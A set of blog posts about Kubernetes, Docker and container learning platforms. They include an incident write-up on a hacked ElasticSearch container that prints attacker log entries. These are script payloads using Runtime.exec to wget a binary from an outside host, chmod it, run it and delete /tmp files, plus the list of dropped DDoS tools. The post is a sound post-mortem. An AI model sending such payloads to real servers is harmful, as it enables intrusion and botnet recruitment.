Tips on solving E_TOO_MANY_THINGS_TO_LEARN with Kubernetes

At a recent Kubernetes London meetup, I highlighted some of the marvellous work happening within the Kubernetes community and shared some tips on how to get started.

The slides are below:

[Embedded slide deck]

The video of the presentation can be found at:
https://skillsmatter.com/skillscasts/9737-tips-on-solving-e_too_many_things_to_learn

All the demos were delivered via Katacoda, the interactive learning platform I founded. The links are here:
Minikube – https://kubernetes.io/docs/tutorials/kubernetes-basics/cluster-interactive/

Kubeadm – https://www.katacoda.com/courses/kubernetes/getting-started-with-kubeadm

Openshift – http://openshift.katacoda.com/katacoda-introduction/deploy-containers-using-cli/

Helm Package Manager – https://www.katacoda.com/courses/kubernetes/helm-package-manager

Weave Flux – https://www.weave.works/guides/cloud-testdrive-part-2-deploy-continuous-delivery/

Adding bash completion:

source <(kubectl completion bash)
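To keep completion across sessions, the same line can be added to your shell profile (a minimal sketch; adjust the profile path for your setup):

# Persist kubectl bash completion for future shells
echo "source <(kubectl completion bash)" >> ~/.bashrc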

Learn Docker 1.12 and Swarm Mode Interactively with Katacoda

Katacoda is an interactive technical learning platform for software developers. The platform provides environments that are accessible directly via the browser, with no need for configuration or downloads.

With over 70 free interactive scenarios, people come to us to learn cloud-native technologies like Kubernetes and Docker.

We want to help people see the overall picture and enable them to start solving problems. To support Docker 1.12 and Swarm Mode, we have put together five initial scenarios that explain how to run containers at scale.

Each scenario has a step-by-step tutorial to guide users on how to solve a particular problem and complete a task. Alongside this, each user is provisioned with a free Docker cluster that's accessible directly from the browser within seconds, with no downloads or configuration required. Start learning at https://www.katacoda.com/courses/docker-orchestration/

While step-by-step guides highlight how to solve problems, sometimes it's useful just to play. This is why we always include playgrounds: a space to experiment, try commands and see what happens. If it all goes wrong, hit refresh and be allocated a clean new cluster. Try it at https://www.katacoda.com/courses/docker-orchestration/playground

Katacoda has a range of courses, covering Docker in development and production, Container Security, Kubernetes and more! Visit https://www.katacoda.com/learn

Docker as an alternative to runtime version managers

While the usage of Docker in production gets mixed reactions, its usage for development and continuous integration is overwhelmingly popular.

Having used Docker in development for the past two years, my usage patterns have changed. To begin with, I used Docker as an accessible way to have local instances of Redis or Postgres running on OS X or Windows. More recently I've been using it to run various language tools and environments instead of using version managers.

Version managers used to be a necessity. When maintaining more than a few applications, you would end up requiring more than one version of Ruby, Node, Java, etc. running on your machine. Version managers made it simple to switch versions, but they also became another thing to install and manage. When working with other developers, pinning to a particular version became harder to maintain. New starters would begin with the latest version without realising the team's current version.

Fast-forward to Docker and we now have a practical and accessible approach to process isolation. I apply the same method to the various programming language runtimes. For example, when testing an upgrade to Node v4 or Node v5, I used a Docker container to experiment without changing my environment.

This method became even more necessary with Golang. Different open source projects were built against different versions, and I found staying in sync with the correct version, configuration and path settings to be non-trivial. Version managers helped maintain my system but didn't help me stay in sync with others.

With Docker and a simple Bash command, you can launch the correct version, with directories mapped to particular locations, and interact with it as if it were on your local machine. For example, the following command launches a Golang environment for my application.

docker run -it --rm \
  -w /go/src/github.com/$NAME \
  -v $(pwd)/vendor/github.com/:/go/src/github.com/ \
  -v $(pwd):/go/src/github.com/$NAME \
  golang:1.4.2

The command maps the current directory to /go/src/github.com/$NAME inside the container. I store all the vendored dependencies under /vendor/ in source control, but remap them to a different location for the Golang runtime. I can run commands such as go get or go build as if Golang were on my host. When I upgrade, I just delete the Docker image and pull down the correct version. Nothing else is left hanging around on my host.
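To avoid retyping the command, it can be wrapped in a small shell function (an illustrative sketch; the godev name and the NAME variable are placeholders of my own, not part of the original setup):

# Launch a throwaway Golang container for the repository given as an argument,
# e.g. `godev user/project` run from the project's root directory
godev() {
  NAME=$1
  docker run -it --rm \
    -w /go/src/github.com/$NAME \
    -v $(pwd)/vendor/github.com/:/go/src/github.com/ \
    -v $(pwd):/go/src/github.com/$NAME \
    golang:1.4.2
}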
Mark Rendle recently used the same approach in DockNet, running the latest version of DotNet on different Linux distros. By moving the runtime into a container, you gain greater control, flexibility and shareability.

Want to see it in action? Load the Katacoda environment below. The editor has a simple “Hello World” application. Clicking Run will launch you into a Docker container, where you can run node, start the process and access the service as usual.

var http = require("http");

var requestListener = function (req, res) {
  res.writeHead(200);
  res.end("Hello, World!");
};

var server = http.createServer(requestListener);
server.listen(3000, function () {
  console.log("Listening on port 3000");
});
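Inside the container, the usual Node workflow applies (assuming the file is saved as app.js; adjust the filename to match the editor):

# Start the server inside the container
node app.js
# In another terminal, check the service responds
curl http://localhost:3000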

Changing times at Cisco with Mantl, Contiv, Shipped and Cisco Cloud

Until recently I considered Cisco to be a company that focuses primarily on data centres and networking hardware. Attending the Cisco Live event last week made me change my mind. Times are changing! Cisco is changing.

The last three years have introduced dramatic changes to the infrastructure ecosystem. Container technology has become accessible. Scheduling platforms like Mesos are in use outside of the top Silicon Valley companies. Automation of the deployment process is possible with amazing tools like Terraform and Ansible. The style of microservices, or component-based architectures, has been born. Many developers will simply consider microservices another buzzword, a new term for well-known ways of architecting systems. While this is true, the latest conversations have reignited discussion about the risks of monolithic systems and introduced new questions about deploying these components as globally distributed services.

These questions are causing many sleepless nights in the developer world. The learning curve to understand all the moving parts is steep; some days I believe it's almost vertical. I'm currently working on solving this problem with Katacoda, an interactive learning platform dedicated to helping developers understand this rapidly changing world.

Cisco and their partners are creating tools to answer similar questions. They consider issues like deploying distributed services and making use of the available open source tooling. During Cisco Live, the majority of the conversations gathered around the Cisco Cloud team. With support from Container Solutions, Remember to Play and Asteris, Cisco has built Mantl.

According to Cisco, Mantl “is a modern platform for rapidly deploying globally distributed services”. From my perspective, it's a best-of-breed platform: it combines the finest open source systems and makes them simple to deliver as end-to-end solutions. This aim is achieved without any vendor lock-in and by releasing the product under the Apache License. In this way the platform fits the “Batteries Included But Removable” mindset.

Mantl is the glue that connects services and infrastructure together. Out of the box, it manages the provisioning of infrastructure and software using code artefacts. It manages deployments using Ansible and Terraform, which means it supports the major cloud platforms. It continues by deploying your software onto a Mesos cluster, with software-defined networking via Calico, service discovery using Consul, and logging with the ELK stack, to name a few. All managed under source control, exactly where it should be.

Mantl Architecture

The architectural decision to build on top of existing tooling is significant. By not re-inventing the wheel, Mantl becomes an appealing platform: a combination of your existing go-to tooling.

Container Solutions presented an impressive example of how to work with the platform. They have put together a case-study system collecting data for localised fog predictions. Who doesn't like IoT, big data and drones?

The resulting architecture looked like something we built for a previous client that involved predicting faults. In theory, if we had used Mantl we'd have saved significant time and investment on our infrastructure work. We used the ELK stack, Consul and many of the other tools Mantl is based on, meaning it would have felt familiar. We'd also have gained the benefits of running on top of Mesos/Marathon for free. As a result, the team could have spent more energy on data analytics instead of infrastructure.

Mantl points to an interesting future and direction. The container ecosystem is still young with no clear winner. Mantl's approach feels sane as it's agnostic to the underlying tooling. As a result, it has the potential to win the hearts and minds of many users.

But it's not going to be an easy task. One of the main challenges I foresee is shielding users from the underlying complexity as the platform grows. It's important to keep the initial setup a simple and welcoming process. Another aspect will be educating users in using Kibana, Marathon, Vault, etc. once it's up and running.

Ensuring the platform is easy to get started with is key. I'm seeing too many platforms attempting a long sales approach that puts developers off. Developers don't want to jump through hoops to start playing with technologies. One of the worst things companies can do is force them to join a “Sales Call” to see if they're suitable. The great aspect of Mantl is that it's open to everyone. By using familiar tooling like Ansible, Terraform and Vagrant, the platform allows you to get started quickly. Other “Control Planes” should take note.

Mantl wasn't the only interesting project discussed during the conference. Shipped is a hosted CI/CD/PaaS platform that uses Mantl under the covers. Mantl provides deployment of your application onto a Mesos cluster in AWS and other cloud providers, as it's completely cloud agnostic.

What happens when an ElasticSearch container is hacked

Being hacked is an interesting experience. There are five stages to being hacked. The first is denial: there's no way someone could hack you. The second is blame: it must have been another problem, not hackers. The third is acceptance: wondering whether you really were hacked. The fourth is fear: what did they do!? The final stage is investigation, where the fun starts as you find out what they actually did.

These stages happened to me after launching an ElasticSearch instance on a Digital Ocean droplet using Docker. An external service required the ElasticSearch instance, but only for a demo; it was never intended for production use. The problem arose after I forgot to turn off the Docker container and the droplet instance. Here's what happened next.

Digital Ocean gets unhappy

The first sign of anything going wrong was an email from Digital Ocean. The email indicated that they had terminated network access to one of my droplets.

In the control panel, the bandwidth graph indicated high outbound bandwidth. At its peak it was over 500Mbps. This had all the hallmarks of an outgoing DDoS attack, but I had no idea how they had gained entry.

[Graph: outbound bandwidth spike shown in the Digital Ocean control panel]

Even without network access, you can still control the droplet via Digital Ocean's VNC console.

Investigating the hack

To start, I performed the basic checks to see what went wrong. I checked for missing security updates and looked at the running processes, but nothing highlighted any issues. I ran standard debugging tools such as lsof to check for open network connections and files, but they didn't show anything either. It turns out I had rebooted the machine while attempting to regain access. This was a silly mistake, as it closed any active processes and connections. Part of the reason Digital Ocean only removes network access is so that you can debug the active state.
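For reference, these were roughly the kind of checks involved (an illustrative list, not the exact commands run at the time):

ps aux          # look for unexpected processes
lsof -i         # open network connections per process
netstat -tunap  # listening ports and established connections
last            # recent logins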

At this point I was confused. It was then that I turned to the running Docker containers.

Analysing a Hacked Docker Instance

On the host I had a number of Docker containers running. One of these was the latest ElasticSearch image.

After viewing the logs I found some really interesting entries. There was a higher number of errors than normal. These errors didn't relate to the running demo, and often they referenced files in /tmp/. This caused alarm bells to start ringing.

What did the hackers do?

As ElasticSearch was running inside a container, I could identify exactly what the impact was. I was also confident that the hack was contained and that they hadn't gained access to the host.

The ElasticSearch logs gave clues to the commands executed. From the logs, the hack attempt lasted from 2015-07-05 03:29:29,674 until 2015-07-11 06:54:02,332, which is likely when Digital Ocean pulled the plug.

The queries executed took the form of Java code. The code downloaded assets and then executed them.

org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/xdvi http://<ip address>:9985/xdvi\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();"}}}]]
org.elasticsearch.search.SearchParseException: [esindex][4]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"chmod 777 /tmp/cmd\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1}]]
org.elasticsearch.search.SearchParseException: [esindex][2]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"/tmp/cmd\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1}]]

The hackers cared enough to clean up after themselves, which was nice of them.

org.elasticsearch.search.SearchParseException: [esindex][2]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"rm -r /tmp/*\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1}]]

As the attack was still running, they didn't get a chance to remove all the files. Every Docker container is based on an image, and any changes to the filesystem are stored separately. The command docker diff <container> lists the files that were added or changed. Here's the list:

C /bin
C /bin/netstat
C /bin/ps
C /bin/ss
C /etc
C /etc/init.d
A /etc/init.d/DbSecuritySpt
A /etc/init.d/selinux
C /etc/rc1.d
A /etc/rc1.d/S97DbSecuritySpt
A /etc/rc1.d/S99selinux
C /etc/rc2.d
A /etc/rc2.d/S97DbSecuritySpt
A /etc/rc2.d/S99selinux
C /etc/rc3.d
A /etc/rc3.d/S97DbSecuritySpt
A /etc/rc3.d/S99selinux
C /etc/rc4.d
A /etc/rc4.d/S97DbSecuritySpt
A /etc/rc4.d/S99selinux
C /etc/rc5.d
A /etc/rc5.d/S97DbSecuritySpt
A /etc/rc5.d/S99selinux
C /etc/ssh
A /etc/ssh/bfgffa
A /os6
A /safe64
C /tmp
A /tmp/.Mm2
A /tmp/64
A /tmp/6Sxx
A /tmp/6Ubb
A /tmp/DDos99
A /tmp/cmd.n
A /tmp/conf.n
A /tmp/ddos8
A /tmp/dp25
A /tmp/frcc
A /tmp/gates.lod
A /tmp/hkddos
A /tmp/hsperfdata_root
A /tmp/linux32
A /tmp/linux64
A /tmp/manager
A /tmp/moni.lod
A /tmp/nb
A /tmp/o32
A /tmp/oba
A /tmp/okml
A /tmp/oni
A /tmp/yn25
C /usr
C /usr/bin
A /usr/bin/.sshd
A /usr/bin/bsd-port
A /usr/bin/bsd-port/conf.n
A /usr/bin/bsd-port/getty
A /usr/bin/bsd-port/getty.lock
A /usr/bin/dpkgd
A /usr/bin/dpkgd/netstat
A /usr/bin/dpkgd/ps
A /usr/bin/dpkgd/ss

With the help of the log files, it looks like they uploaded and executed a single command. This proceeded to download and launch the DDoS attack, a popular command and control pattern.

Investigating the files

My debugging skills only go so far, but I did manage to find a few titbits of information. Most of the files are statically linked binaries, reported as either "application/octet-stream; charset=binary" or "ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=5036c5788090829d54797078db7c67a9b0571db4, stripped". It's interesting to see in the logs how they work out whether the OS is Windows or Linux.
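Those descriptions come from the file utility. A minimal sketch of how a dropped binary can be pulled out of the container for inspection (the path here is one of the files from the docker diff listing; the local filename is arbitrary):

# Copy a suspicious file out of the container and identify its type
docker cp <container>:/usr/bin/dpkgd/ps ./suspect
file ./suspect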

The logs did highlight one source. The command executed was wget -O /tmp/cmd http://<IP Address>:8009/cmd. This pointed towards a Windows 2003 server, running IIS, in China. It was likely hacked itself and then used as a distribution point.

The root cause

So what vulnerability did they exploit? It wasn't an exploit; instead, they used a feature of ElasticSearch. This demonstrates why you shouldn't expose these types of services to the outside world. Docker makes it easy to expose services to the outside world, but as a result it's also easy to forget that people are looking for targets.
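One simple mitigation is to publish the port only on the loopback interface, so processes on the host can reach ElasticSearch but the internet cannot (a minimal sketch, not how the original demo was run):

# Bind the published port to localhost only instead of all interfaces
docker run -d -p 127.0.0.1:9200:9200 elasticsearch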

How the attack worked and what the intended target was is a little harder to understand. I've exported the container as a Docker image. If anyone is interested, please contact me and I'll send you what I have.

Before the “Docker’s insecure” comments

If I had run the process on the host and opened the same ports, it would still have been hacked. The only difference is that they would have had access to the entire machine instead of just the container.

The reason I was hacked is that I opened up a powerful database to the outside world so it could be accessed by other services.

I find it more interesting to consider how a new deployment approach like Docker could allow infrastructure to be secure by default. The future “Docker & Containers in Production” course on Scrapbook and my workshops will cover these aspects.

Lessons

There are three major lessons to be taken away from this.

1) Don't expose services to the public internet without authentication, even for a short period of time.

2) It’s important to monitor containers for malicious activity and strange behaviour. I’ll cover how Scrapbook (my current project) handles this in a future blog post.

3) Next time I want a sandboxed environment, I'll use Scrapbook to spin up a sandboxed learning environment.

September 2015 – Docker talk (London) and workshop (Oslo)

With the summer behind us, we rejoin the conference season. September sees me presenting at Container Camp in London and running a workshop in Oslo.

London. 11th September – https://container.camp/

I'll be speaking at Container Camp on “Lessons from running potentially malicious code inside containers”. The talk will share insights into Docker's security model and the lessons from building the online learning environment Scrapbook.

Oslo, Norway. 24th September 2015. – http://programutvikling.no/en/course/deploying-docker-and-containers-into-development-and-production/

I’ll also be running a workshop with ProgramUtvikling, the team behind NDC. The title is “Deploying Docker and Containers Into Development and Production”.

During October and November I'll be presenting at a few conferences in Europe. I have some extra capacity, so please contact me if you're interested in container-based consultancy or training.


Try Docker 1.8 RC with Scrapbook

I love playing with and exploring new approaches and technologies, and understanding why they're different. Yet many upcoming technologies have a high barrier to entry, which removes the fun of learning. So we set out to put the fun back into learning new technologies with Scrapbook.

The aim of Scrapbook has been to make it easier to learn and play with new technologies. We recently released Docker scenarios to teach Docker with an online learning environment.

Docker just announced the new 1.8 RC release, which you can now try with Scrapbook. We've created a playground that has the latest Docker daemon and client for you to use.

Docker 1.8 on Scrapbook

The playground is available at app.joinscrapbook.com/ben_hall/scenarios/docker_rc

For a limited time only the Docker course is available for free.

Setting Docker’s DOCKER_OPTS on Ubuntu 15.04

The recent release of Ubuntu (15.04) introduced systemd as a replacement for Upstart. Systemd is an init system for Linux and starts all the required services.

With new systems come new approaches. One of the main activities is customising the launch of services such as Docker.

With Upstart, extra Docker launch parameters, such as storage options, are set in /etc/default/docker. An example is 'DOCKER_OPTS="-H unix:///var/run/docker.sock"'.

With systemd, you need to update Docker's service file to use the extra parameters via an EnvironmentFile.

Steps

1) Docker's service file is located at /lib/systemd/system/docker.service

2) The ExecStart line defines how to start a service. By default this is ExecStart=/usr/bin/docker -d -H fd://

3) Include the line EnvironmentFile=/etc/default/docker above ExecStart

4) Update the ExecStart line to use the $DOCKER_OPTS variable from that file:
ExecStart=/usr/bin/docker -d -H fd:// $DOCKER_OPTS

The complete docker.service file should look like this:

[Unit]
Description=Docker Application Container Engine
Documentation=https://docs.docker.com
After=network.target docker.socket
Requires=docker.socket

[Service]
EnvironmentFile=/etc/default/docker
ExecStart=/usr/bin/docker -d -H fd:// $DOCKER_OPTS
MountFlags=slave
LimitNOFILE=1048576
LimitNPROC=1048576
LimitCORE=infinity

[Install]
WantedBy=multi-user.target

When the service starts, it also includes the parameters defined in /etc/default/docker.
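For example, a minimal /etc/default/docker might contain just the DOCKER_OPTS line (the value below is illustrative). After editing the unit file, systemd needs to reload its configuration before Docker is restarted:

# /etc/default/docker (example contents)
DOCKER_OPTS="-H unix:///var/run/docker.sock"

# Pick up the changes to docker.service and restart the daemon
sudo systemctl daemon-reload
sudo systemctl restart docker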

Two warnings:

1) If /etc/default/docker does not exist then the service will fail to start.

2) Every time you upgrade Docker, the docker.service file is overwritten, meaning you need to repeat the above steps. This is why I find it useful to keep the variables in a separate file.

Docker’s Experimental Binary running in a Scrapbook Playground

As some of you are aware, I'm currently in the process of building Scrapbook, an interactive learning environment for developers. The aim of Scrapbook has always been to make learning new technologies and frameworks easier and more interactive. By removing the need to download and configure the technologies, you can jump straight into exploring while still having enough access and control to learn and break things in your own way.

Today Docker announced an easier way to try new bleeding edge features via an experimental binary.

“Docker’s experimental binary gives you access to bleeding edge features that are not in, and may never make it into, Docker’s official release.  An experimental build allows users to try out features early and give feedback to the Docker maintainers” http://blog.docker.com/2015/06/experimental-binary/

However, experimental binaries, by their very nature, may have unknown side-effects.

To make it easier for people to use the Docker experimental binary, we've created a playground on Scrapbook. The playground has the latest version installed, allowing you to explore the new features via your browser without having to download or install anything onto your local machine.

Docker experimental binary on Scrapbook

You can sign up for free at http://app.joinscrapbook.com/courses/docker-experimental/playground

If you want to learn more about the current features of Docker then take our interactive online course at http://app.joinscrapbook.com/courses/docker